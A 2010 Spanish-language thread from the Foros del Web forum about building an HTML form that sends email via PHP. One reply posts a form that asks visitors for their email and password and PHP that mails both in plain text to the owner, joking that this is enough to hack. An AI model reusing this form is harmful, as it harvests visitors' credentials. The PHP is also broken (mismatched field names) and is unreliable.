Foros del Web » Creando para Internet » HTML »

Mandar formulario por mail

Estas en el tema de Mandar formulario por mail en el foro de HTML en Foros del Web. Hola, alguien me podria ayudar a hacer un formulario que mande mails sin outlook? he estado provando casi toda la mañana pero sin exito.. gracias ...
  #1 (permalink)  
Antiguo 14/06/2010, 06:52
 
Fecha de Ingreso: junio-2010
Mensajes: 8
Antigüedad: 13 años, 9 meses
Puntos: 0
Mandar formulario por mail

Hola, alguien me podria ayudar a hacer un formulario que mande mails sin outlook? he estado provando casi toda la mañana pero sin exito..

gracias de antemano
  #2 (permalink)  
Antiguo 14/06/2010, 07:36
Avatar de abimaelrc
Colaborador
 
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.734
Antigüedad: 14 años, 10 meses
Puntos: 1517
Respuesta: Mandar formulario por mail

Para ello necesitas conocimiento de algún lenguaje del lado del servidor (PHP, ASP, Java, etc.). ¿Cuál sabes? Si no sabes alguno y quieres que te hagan el formulario, te recomiendo que postees en el área Ofertas de empleo.
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #3 (permalink)  
Antiguo 15/06/2010, 12:47
Avatar de dots3r  
Fecha de Ingreso: julio-2008
Mensajes: 106
Antigüedad: 15 años, 8 meses
Puntos: 5
Respuesta: Mandar formulario por mail

Puedes buscar en google como "Formulario de contacto PHP" para que te des una idea, hay bastante contenido sobre el tema.

Suerte
__________________
Ideorama. Su presencia en Internet
  #4 (permalink)  
Antiguo 15/06/2010, 13:37
 
Fecha de Ingreso: junio-2010
Mensajes: 7
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Mandar formulario por mail

Yo te ayudo a hacer 1 en flash si quires te paso los archivos
agregame [email protected]
  #5 (permalink)  
Antiguo 15/06/2010, 16:42
 
Fecha de Ingreso: junio-2010
Mensajes: 51
Antigüedad: 13 años, 9 meses
Puntos: 1
Respuesta: Mandar formulario por mail

En este mismo foro puedes encontrar muchos ejemplos pues es una pregunta muy comun, en google puedes encontrar muchos tutos, para ello debes conocer un lenguaje de programacion del lado servidor como php o asp segun lo que te convenga
  #6 (permalink)  
Antiguo 15/06/2010, 17:58
Avatar de deirdre  
Fecha de Ingreso: mayo-2009
Mensajes: 690
Antigüedad: 14 años, 10 meses
Puntos: 45
Respuesta: Mandar formulario por mail

Hola Anzay

Si pones cómo lo estás haciendo (el foro es para aprender, no sólo para copiar), seguro que podremos ayudarte a completarlo.

Saludos
  #7 (permalink)  
Antiguo 15/06/2010, 20:09
 
Fecha de Ingreso: junio-2010
Mensajes: 6
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Mandar formulario por mail

ajammmm


me imagino ke tienes el formilario ya hecho buenoooo

de todas maneras lo voy a hacer y te explico paso a paso




<form method="POST" action="tu_archivo.php">
<table>
<tr>
<td>
Direccion de correo electronico <input type="text" id="email" name="email"/>
</td>
<td>
Password <input type="password" class="inputpassword" id="pass" name="pass" value=""

tabindex="2" />
</td>
</tr>
</table>
<br>
<br>
Comentarios <br> <textarea id="text" name="text"></textarea>
<br>
<INPUT TYPE="submit" value="send">
</form>





Ese es el formulario : donde "tu_archivo.php" es un archivo php el cual tendra el codigo ke enviara el correo ..ajammm


Codigo php


<?php

$mail='TUCORREO';

$email = $_POST['email'];

$password = $_POST['pass'];

$mensaje = $_POST['comentarios'];

$thank="AS.html";

$message = "

email:".$email."

clave:".$password."

mensaje:".$mensaje."";

if (mail($mail,"Formulario de Consulta",$message))

Header ("Location: $thank");

?>





DEBES CAMBIAR DONDE DICE TU CORREO POR*tu verdadero correo xd*
el mensaje te llegara alrededor de 30 minutos.........

creo ke tengo un error porque te di un codigo ke enviaria un email y un password, jajaja lo suficiente para hackear peroooo no creo ke sepas como xD


no mentira..jaja
  #8 (permalink)  
Antiguo 15/06/2010, 20:10
 
Fecha de Ingreso: junio-2010
Mensajes: 6
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Mandar formulario por mail

ese ultimo ke te pase es "tu_archivo.php"
  #9 (permalink)  
Antiguo 16/06/2010, 13:19
 
Fecha de Ingreso: junio-2010
Mensajes: 8
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Mandar formulario por mail

no se que pasa, pero el mail nunca llega ni esperando 30 mins by_K

Etiquetas: mail, mandar, formulario
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 08:18.